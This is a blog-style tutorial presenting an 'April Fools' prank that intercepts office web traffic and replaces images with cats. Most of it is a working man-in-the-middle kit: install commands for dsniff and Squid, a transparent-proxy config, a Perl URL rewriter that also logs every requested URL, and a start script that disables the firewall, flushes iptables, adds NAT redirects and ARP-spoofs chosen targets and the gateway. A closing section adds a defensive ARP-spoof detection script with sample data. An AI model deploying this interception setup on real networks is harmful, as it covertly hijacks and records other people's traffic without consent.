April Fools 2017 - MITM and Cats, what could go better together!


April Fools 2017 is fast approaching... let's have some fun.

For this year's April Fools joke I decided to have a little fun in the office and run a small man-in-the-middle attack that replaces all the images with cats. Most of the code for this was already out there, but it was outdated and no longer working, so I decided to give it a refresh.

Equipment needed:
  • Raspberry Pi or other Linux PC (I'm using Ubuntu 16.04 on a notebook)
  • Squid proxy (version 3.5.12)
  • iptables for the NAT/redirect rule that sends web traffic to the proxy
  • arpspoof (from dsniff version 2.4)
  • A sense of humour

Installation:

Install the required software:

    sudo apt-get update
    sudo apt-get -y install iptables
    sudo apt-get -y install squid    # use squid3 on Raspbian
    sudo apt-get -y install dsniff

Configure squid

Note: if you installed squid3 rather than squid, substitute squid3 in the various places (config files, log files, systemctl commands, etc.).

    sudo cp /etc/squid/squid.conf /etc/squid/squid_orig.conf
    sudo vi /etc/squid/squid.conf

Contents of /etc/squid/squid.conf (Squid 3.5.x):

    url_rewrite_program /usr/local/bin/cats.pl
    acl to_localhost dst 127.0.0.0/8 0.0.0.0/32 ::1
    acl localnet src 192.168.1.0/24 # RFC1918 possible internal network
    acl SSL_ports port 443
    acl Safe_ports port 80 # http
    acl Safe_ports port 21 # ftp
    acl Safe_ports port 443 # https
    acl Safe_ports port 70 # gopher
    acl Safe_ports port 210 # wais
    acl Safe_ports port 1025-65535 # unregistered ports
    acl Safe_ports port 280 # http-mgmt
    acl Safe_ports port 488 # gss-http
    acl Safe_ports port 591 # filemaker
    acl Safe_ports port 777 # multiling http
    acl CONNECT method CONNECT
    http_access deny !Safe_ports
    http_access deny CONNECT !SSL_ports
    http_access allow localhost manager
    http_access deny manager
    http_access allow localhost
    http_access allow localnet
    http_access deny all
    http_port 3128 transparent
    refresh_pattern ^ftp: 1440 20% 10080
    refresh_pattern ^gopher: 1440 0% 1440
    refresh_pattern -i (/cgi-bin/|\?) 0 0% 0
    refresh_pattern (Release|Packages(.gz)*)$ 0 20% 2880
    refresh_pattern . 0 20% 4320

Note: set the localnet ACL to the address range of your own local network.

For Raspbian with squid3 I had to use the following http_port lines instead:

    http_port 8080
    http_port 3128 intercept

Cats Re-Writer

Create your cats rewriter in /usr/local/bin/cats.pl:

    sudo vi /usr/local/bin/cats.pl
    sudo chmod 755 /usr/local/bin/cats.pl

Contents of /usr/local/bin/cats.pl:

    #!/usr/bin/perl
    # Squid url_rewrite_program helper. Squid sends one request per line
    # ("URL client/fqdn ident method ...") and expects either an empty line
    # (leave the URL alone) or a replacement URL in return.
    use strict;
    use warnings;
    use IO::Handle;

    $| = 1;            # unbuffered stdout: Squid blocks until it gets each answer
    my $count = 0;
    my $pid   = $$;

    open(my $debug, '>>', '/tmp/cats.log') or die "cannot open /tmp/cats.log: $!";
    $debug->autoflush(1);

    print $debug "########################################################################\n";

    while (my $line = <STDIN>) {
      chomp $line;
      my @inputs = split / /, $line;
      my $url = $inputs[0];           # first field is the requested URL

      if ($url =~ /.*media\.tumblr\.com\/tumblr_.*/i) {
        # tumblr-hosted pictures pass through untouched, otherwise the
        # replacement cat images would themselves be rewritten again
        print $debug "Input NOSQUID: $url\n";
        print "\n";
        print $debug "Output NOSQUID: $line\n";
      }
      elsif ($url =~ /\.(jpe?g|gif|png)/i) {
        # any image URL: hand the client a random cat in the same format
        my $type = lc $1;
        my $cat  = "http://thecatapi.com/api/images/get?format=src&type=$type&nosquid";
        print $debug "Input: $url -> $cat\n";
        print "$cat\n";
      }
      else {
        print "\n";                   # not an image: no rewrite
      }
      $count++;
    }
    close $debug;

Running Squid

    systemctl restart squid

Check /var/log/squid/cache.log for any unexpected errors.

Script the Attack

    vi start.sh

Contents of start.sh:

    #!/bin/sh
    #--optional if you are using UFW
    echo "Disabling Firewall"
    ufw disable
    #--optional if you are using Apache
    echo "Stopping Apache"
    sudo systemctl stop apache2
    echo "Enabling NAT"
    echo 1 > /proc/sys/net/ipv4/ip_forward
    echo "Flushing Firewall"
    iptables -F
    echo "Setting Proxy Intercept"
    iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner proxy --dport 80 -j REDIRECT --to-port 3128

    #arpspoof -i eth0 192.168.1.1   # arp the whole network according to the man pages, but I've never been able to get this to work for a whole network

    echo "Starting Arp Spoofing"
    arpspoof \
    -t (YOUR TARGET) \
    -t (YOUR TARGET) \
    -i eth0 (YOUR GATEWAY IP)
    #arpspoof will continue to run until control-c is pressed cancelling the spoofing
    sleep 15
    echo "Flushing Firewall"
    iptables -F
    echo "Disabling NAT"
    echo 0 > /proc/sys/net/ipv4/ip_forward
    echo "Enabling UFW"
    ufw enable
    sudo systemctl start apache2
    # Note..  sometimes I have noticed a problem where it does not remove the NAT rule, and the machine needs to be rebooted..

Note: for Raspbian I had to use the following NAT rule:

    iptables -A PREROUTING -t nat -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 3128

Diagnosing problems

After going through several blogs on various ways to get this working, there are slight differences between Ubuntu and Raspbian, as well as between NAT and Squid versions. Here are the steps I usually go through to resolve problems:

1) Get the base Squid proxy working with defaults (point your browser's proxy settings at it to test)
2) Resolve ACL issues in the Squid config
3) Resolve the "transparent" vs non-transparent issue with Squid (disable it for direct browser testing). If you get an unexpected "Access Denied", try turning off transparent mode; you can also try "intercept" rather than "transparent"
4) Enable and debug cats.pl
5) Resolve NAT / redirect issues
6) Test ARP poisoning

Note: you usually have to enable and test transparent proxying, NAT and ARP spoofing all at the same time.
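Step 6 above, seen from the other side of the wire: the visible symptom of an arpspoof run on a victim is that its neighbour table suddenly maps the gateway's IP to the attacking host's MAC, so that one MAC address now claims two IPs. The following script is an added example (not part of the original post) that diffs two snapshots of `ip neigh show` output and flags exactly those two symptoms. The snapshots, the MAC addresses and the gateway address 192.168.1.1 are constructed sample data.

```python
"""Spot ARP-spoofing symptoms by diffing neighbour-table snapshots.

Parses the line format of `ip neigh show` ("IP dev IFACE lladdr MAC STATE")
and reports (a) the gateway's MAC changing between snapshots and
(b) a single MAC address being listed for more than one IP.
"""
import re
from collections import defaultdict

NEIGH_RE = re.compile(
    r"^(?P<ip>\S+)\s+dev\s+(?P<dev>\S+)\s+lladdr\s+(?P<mac>[0-9a-f:]{17})\s+(?P<state>\S+)",
    re.IGNORECASE,
)


def parse_neigh(text):
    """Return {ip: mac} from `ip neigh show` output.

    Entries without an lladdr (FAILED / INCOMPLETE) carry no MAC and are skipped.
    """
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table


def find_alerts(before, after, gateway_ip):
    """Compare two parsed tables and return a list of alert tuples."""
    alerts = []
    # (a) the gateway answering from a different MAC than last time
    if gateway_ip in before and gateway_ip in after and before[gateway_ip] != after[gateway_ip]:
        alerts.append(("GATEWAY_MAC_CHANGED", gateway_ip, before[gateway_ip], after[gateway_ip]))
    # (b) one MAC claiming several IPs (the spoofing host plus the gateway it impersonates)
    by_mac = defaultdict(list)
    for ip, mac in after.items():
        by_mac[mac].append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            alerts.append(("MAC_CLAIMS_MULTIPLE_IPS", mac, tuple(sorted(ips))))
    return alerts


# Constructed sample snapshots: before and after a spoofing run, where the
# host at 192.168.1.50 starts answering ARP for the gateway 192.168.1.1.
BEFORE = """\
192.168.1.1 dev eth0 lladdr 00:11:22:33:44:01 REACHABLE
192.168.1.20 dev eth0 lladdr 00:11:22:33:44:20 STALE
192.168.1.50 dev eth0 lladdr 00:11:22:33:44:50 REACHABLE
192.168.1.99 dev eth0  FAILED
"""
AFTER = """\
192.168.1.1 dev eth0 lladdr 00:11:22:33:44:50 REACHABLE
192.168.1.20 dev eth0 lladdr 00:11:22:33:44:20 STALE
192.168.1.50 dev eth0 lladdr 00:11:22:33:44:50 REACHABLE
"""


def demo():
    """Run the check over the constructed snapshots."""
    return find_alerts(parse_neigh(BEFORE), parse_neigh(AFTER), "192.168.1.1")


if __name__ == "__main__":
    for alert in demo():
        print(*alert)
```

On a real host you would feed it the output of `ip neigh show` taken a few seconds apart (or the arp cache from the office switch's perspective). One MAC with several IPs is not proof on its own, since a router carrying more than one address or a failover pair can look the same, which is why the gateway-MAC change is the stronger signal.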